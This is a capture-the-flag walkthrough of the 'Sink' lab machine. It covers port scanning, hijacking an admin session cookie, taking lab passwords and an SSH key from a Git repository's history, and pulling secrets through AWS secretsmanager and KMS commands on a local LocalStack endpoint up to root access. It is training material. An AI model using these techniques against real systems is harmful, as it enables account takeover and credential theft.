In this post, i would like to share a walkthrough on Sink Machine.
This room is been considered difficulty rated as an Insane machine
Information Gathering on Sink Machine
Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address>
The nmap result can be seen above and two(2) port that open have caught my attention.
- 3000 – Gitea
- 5000 – Devops
The screenshot above shows the login page on the 5000
The screenshot above shows the login page on the 3000
On the 3000 directories, we only can register on the login page, and we cannot register our credentials.
Gaining Access to Sink Machine
Looking back on the sink.htb:5000 web interface, i notice that we can register ourselves
After doing some research on the internet, i found a website that can help with the exploit over here
We should be changing the admin’s cookie with our own cookie
- Reminder: Cwo= is written in base64 encode string where you need to unbase64 those with the button “control+shift+b” together.
There’s a credential saved on each ID.
Note1:
Chef Login : http://chef.sink.htb
Username : chefadm
Password : /6'fEGC&zEx{4]zz
Note2:
Dev Node URL : http://code.sink.htb
Username : root
Password : FaH@3L>Z3})zzfQ3
Note3:
Nagios URL : https://nagios.sink.htb
Username : nagios_adm
Password : g8<H6GK\{*L.fB3C
One of the passwords above that can be used for login could be login credentials for the sink.htb:3000
We managed to login the dashboard of gitea website
Let’s access the root’s repositories after we found out that the username root has been created.
We have a bunch of files stored over here and one of the files can be useful to us. There are 9 commits on the repo in which we found a file called “Adding EC2 Key Management Structure”
Maintaining Access
What a surprise! A public key has been saved within that file. Let’s copy the entire key and paste it on a new id_rsa file on the attacker’s machine.
Let’s ssh into the machine with Marcus’ privileges and public key.
On the /home/ directory, i notice that 3 users appear there.
For us to read the user flag, we need to go to /home/Marcus directory and execute the command “cat user.txt“
Escalate to Root Privileges Access on the Machine
Let’s see which port is been used on the machine itself. After seeing the result, I notice that 4566 is listening and I’m curious about it.
Let’s do a port forwarding just like shown above.
We found some interesting files on Marcus’ git profile
Playing with AWS configuration on Sink Machine
We managed to get the key and secret for the AWS configuration.
Let’s investigate the configuration of the secretsmanager we found that there’s an encoded string that we cannot understand
Let’s get the password value by executing the command mentioned below:
aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-HRbzR"
We can change the user from Marcus to David
Inside the /home/david/ directory, we found that there’s a folder /Projects/Prod_Deployment that might store something useful.
There’s a file named servers.enc and let’s open the file by running the command “cat servers.enc”
Oh no! It’s hard to read because the file is been encrypt
Let’s see the list-key by executing the command aws –endpoint-url=”http://127.0.0.1:4566/” kms list-keys and we should decrypt the key which contains a file encoded base64
We can decode it using cyberchef and manage to get the username and password.
The credentials that we gained are shown below:
User: admin Password: _uezduQ!EY5AHfe2
Let’s change privileges to root access and it works like charm!
To read the root flag, we need to access /root/ directory where the root flag has normally been saved.
-THE END-
Happy Learning Guys!
The screenshot above shows where I get the password hashes to unlock this write-up
No responses yet